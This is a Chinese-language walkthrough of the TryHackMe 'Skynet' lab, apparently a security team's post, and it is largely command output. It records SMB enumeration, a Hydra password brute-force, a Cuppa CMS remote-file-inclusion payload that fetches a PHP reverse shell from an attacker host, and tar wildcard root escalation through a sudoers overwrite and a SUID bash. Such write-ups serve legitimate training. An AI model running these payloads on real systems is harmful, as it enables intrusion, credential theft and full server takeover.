-
smb扫描
-
爆破密码
-
cms历史漏洞
-
定时任务 tar 提权, 通过 * 来用文件名传参
└─# nmap 10.10.192.134
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 17:44 CST
Nmap scan report for 10.10.192.134
Host is up (0.34s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 3.34 seconds
┌──(root㉿kali)-[~]
└─# nmap 10.10.192.134 -A -p 22,80,110,139,143,445
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 17:45 CST
Nmap scan report for 10.10.192.134
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Skynet
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE CAPA UIDL TOP RESP-CODES PIPELINING
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 post-login LOGINDISABLEDA0001 Pre-login SASL-IR capabilities more ID LOGIN-REFERRALS listed have IDLE OK ENABLE LITERAL+
445/tcp open netbios- Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (96%) Linux 5.4 (95%) ASUS RT-N56U WAP (Linux 3.4) (95%) Linux 3.16 (95%) Linux 3.1 (93%) Linux 3.2 (93%) AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%) Sony Android TV (Android 5.0) (93%) Android 5.0 - 6.0.1 (Linux 3.4) (93%) Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNETx00
| Domain name: x00
| FQDN: skynet
|_ System time: 2024-03-31T04:45:45-05:00
| smb2-time:
| date: 2024-03-31T09:45:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET NetBIOS user: NetBIOS MAC: (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous but default)
|_clock-skew: mean: 1h40m00s deviation: 2h53m12s median: 0s
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 201.04 ms 10.2.0.1
2 ...
3
4 330.96 ms 10.10.192.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.05 seconds
└─# ffuf -w /usr/share/wordlists/dirb/common.txt -u "http://10.10.192.134/FUZZ" -fs 1341
/'___ /'___ /'___
/ __/ / __/ __ __ / __/
,__\ ,__/ / ,__
_/ _/ _ _/
_ _ ____/ _
/_/ /_/ /___/ /_/
v2.1.0-dev
_______________________________________________
:: Method : GET
:: URL : http://10.10.192.134/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299301302307401403405500
:: Filter : Response size: 1341
_______________________________________________
.htpasswd [Status: 403 Size: 278 Words: 20 Lines: 10 Duration: 406ms] [Status: 200 Size: 523 Words: 26 Lines: 19 Duration: 406ms]
.hta [Status: 403 Size: 278 Words: 20 Lines: 10 Duration: 4765ms]
.htaccess [Status: 403 Size: 278 Words: 20 Lines: 10 Duration: 4804ms]
admin [Status: 301 Size: 314 Words: 20 Lines: 10 Duration: 328ms]
config [Status: 301 Size: 315 Words: 20 Lines: 10 Duration: 327ms]
css [Status: 301 Size: 312 Words: 20 Lines: 10 Duration: 328ms]
index.html [Status: 200 Size: 523 Words: 26 Lines: 19 Duration: 349ms]
js [Status: 301 Size: 311 Words: 20 Lines: 10 Duration: 328ms]
server-status [Status: 403 Size: 278 Words: 20 Lines: 10 Duration: 329ms]
squirrelmail [Status: 301 Size: 321 Words: 20 Lines: 10 Duration: 327ms]
:: Progress: [4614/4614] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:42] :: Errors: 0 ::
└─# enum4linux 10.10.192.134
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Mar 31 17:55:01 2024
=========================================( Target Information )=========================================
Target ........... 10.10.192.134
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==============================( Enumerating Workgroup/Domain on 10.10.192.134 )===========================
[+] Got domain/workgroup name: WORKGROUP
=============================( Nbtstat Information for 10.10.192.134 )===============================
SKYNET <00> - B Workstation Service
SKYNET <03> - B Messenger Service
SKYNET <20> - B File Server Service
..__MSBROWSE__. <01> - B Master Browser
WORKGROUP <00> - B Domain/Workgroup Name
WORKGROUP <1d> - B Master Browser
WORKGROUP <1e> - B Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 10.10.192.134 )===================================
[+] Server 10.10.192.134 allows sessions using username '', password ''
===============================( Getting domain SID for 10.10.192.134 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 10.10.192.134 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.192.134 from srvinfo:
SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================Users on 10.10.192.134=======================================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
==================( Share Enumeration on 10.10.192.134 )==================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
==================================( Password Policy Information for 10.10.192.134 )===================
[+] Attaching to 10.10.192.134 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] SKYNET
[+] Builtin
[+] Password Info for Domain: SKYNET
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
===========================( Groups on 10.10.192.134 )==========================
[+] Getting builtin groups:
=================( Users on 10.10.192.134 via RID cycling )==================
S-1-5-32-544 BUILTINAdministrators (Local Group)
S-1-5-32-545 BUILTINUsers (Local Group)
S-1-5-32-546 BUILTINGuests (Local Group)
S-1-5-32-547 BUILTINPower Users (Local Group)
S-1-5-32-548 BUILTINAccount Operators (Local Group)
S-1-5-32-549 BUILTINServer Operators (Local Group)
S-1-5-32-550 BUILTINPrint Operators (Local Group)
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
==============================( Getting printer info for 10.10.192.134 )===============================
No printers returned.
enum4linux complete on Sun Mar 31 18:19:07 2024
存在两个 share
//10.10.192.134/print$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.192.134/anonymous Mapping: OK Listing: OK Writing: N/A
//10.10.192.134/milesdyson Mapping: DENIED Listing: N/A Writing: N/A
匿名访问,发现几个文件
└─# smbclient //10.10.192.134/anonymous
Password for [WORKGROUProot]:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Fri Nov 27 00:04:00 2020
.. D 0 Tue Sep 17 15:20:17 2019
attention.txt N 163 Wed Sep 18 11:04:59 2019
logs D 0 Wed Sep 18 12:42:16 2019
9204224 blocks of size 1024. 5830976 blocks available
smb: > get attention.txt
getting file attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
提示密码可能被修改,还有几个日志
smb: > cd logs
smb: logs> ls
. D 0 Wed Sep 18 12:42:16 2019
.. D 0 Fri Nov 27 00:04:00 2020
log2.txt N 0 Wed Sep 18 12:42:13 2019
log1.txt N 471 Wed Sep 18 12:41:59 2019
log3.txt N 0 Wed Sep 18 12:42:16 2019
9204224 blocks of size 1024. 5830976 blocks available
log1.txt疑似为一个密码本
尝试爆破登录页面
└─# hydra -l milesdyson -P log1.txt 10.10.192.134 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect" -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-31 18:32:44
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 20 tasks per 1 server, overall 20 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.192.134:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect
[80][http-post-form] host: 10.10.192.134 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-31 18:33:06
登陆邮箱
邮件中发现密码
└─# smbclient //10.10.215.58/milesdyson -U milesdyson
Password for [WORKGROUPmilesdyson]:
Try "help" to get a list of possible comma
smb: > cd notes
smb: notes> get important.txt
有很多的文件,我们在notes可看见一个important.txt,get下来
└─# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
提示了增加了测试功能的cms目录 /45kra24zxs28v3yd,进入目录
└─# dirsearch -u http://10.10.215.58/45kra24zxs28v3yd/ -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.215.58/-45kra24zxs28v3yd-_24-04-01_17-23-37.txt
Error Log: /root/.dirsearch/logs/errors-24-04-01_17-23-37.log
Target: http://10.10.215.58/45kra24zxs28v3yd/
[17:23:38] Starting:
[17:24:29] 301 - 337B - /45kra24zxs28v3yd/administrator -> http://10.10.215.58/45kra24zxs28v3yd/administrator/
[17:24:29] 200 - 5KB - /45kra24zxs28v3yd/administrator/
[17:24:29] 200 - 5KB - /45kra24zxs28v3yd/administrator/index.php
[17:25:00] 200 - 418B - /45kra24zxs28v3yd/index.html
Task Completed
└─# searchsploit cuppa
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[/tmp]
└─# locate php/webapps/25971.txt
/usr/share/exploitdb/exploits/php/webapps/25971.txt
┌──(root㉿kali)-[/tmp]
└─# cp /usr/share/exploitdb/exploits/php/webapps/25971.txt /tmp
┌──(root㉿kali)-[/tmp]
└─# cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / ` /
/ XXXXXX /______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User t
ainted data is used when creating the file name that will be included into the current file. PHP code in
this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to
full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../
Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3Vwc
GEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcH
JlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1
pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJt
cDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZ
jsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2
RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7Cgk
JcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVf
bG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.
odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
#########################################################################################################
#######
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Re
tool2
#########################################################################################################
#######
构造payload
http://10.10.215.58/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.2.11.235:8888/php-reverse-shell.php
远程包含反弹shell
获取shell,生成交互式
python -c 'import pty; pty.spawn("/bin/sh")' 
$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$
发现有定时任务
$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
该脚本是tar将/var/www/html下的均备份,保存到/home/milesdyson/backups/backup.tgz ,tar 提权方式为
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh是由两个参数来
-
•
checkpoint[=NUMBER]— 此选项每NUMBER条记录显示进度消息(默认值为 10) -
•
checkpoint-action=ACTION— 此选项在每个检查点上执行所述操作
由于该脚本有 * 所以可通过文件名传参
touch "/var/www/html/--checkpoint-action=exec=sh sudo.sh"
touch "/var/www/html/--checkpoint=1"
建立这两个文件名
sudo.sh有多种方式
-
•
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers'> sudo.sh -
•
echo "#!/bin/bashnchmod +s /bin/bash" > sudo.sh -
•
echo "cp /bin/bash /tmp/nroot && chmod +s /tmp/nroot" > sudo.sh
该脚本的执行结果将创建一个实质为bash副本的SUID二进制文件 我们可以使用 -p标志执行该SUID文件
sudo -l
User www-data may run the following commands on skynet:
(root) NOPASSWD: ALL
$ su
su
Password:
su: Authentication failure
$ sudo su
sudo su
root@skynet:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
echo "cp /bin/bash /tmp/nroot && chmod +s /tmp/nroot" > sudo.sh
$ ./nroot -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.3$ /bin/bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(roo、t),33(www-data)
原文始发于微信公众号(ZeroPointZero安全团队):THM靶机学习-Skynet
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论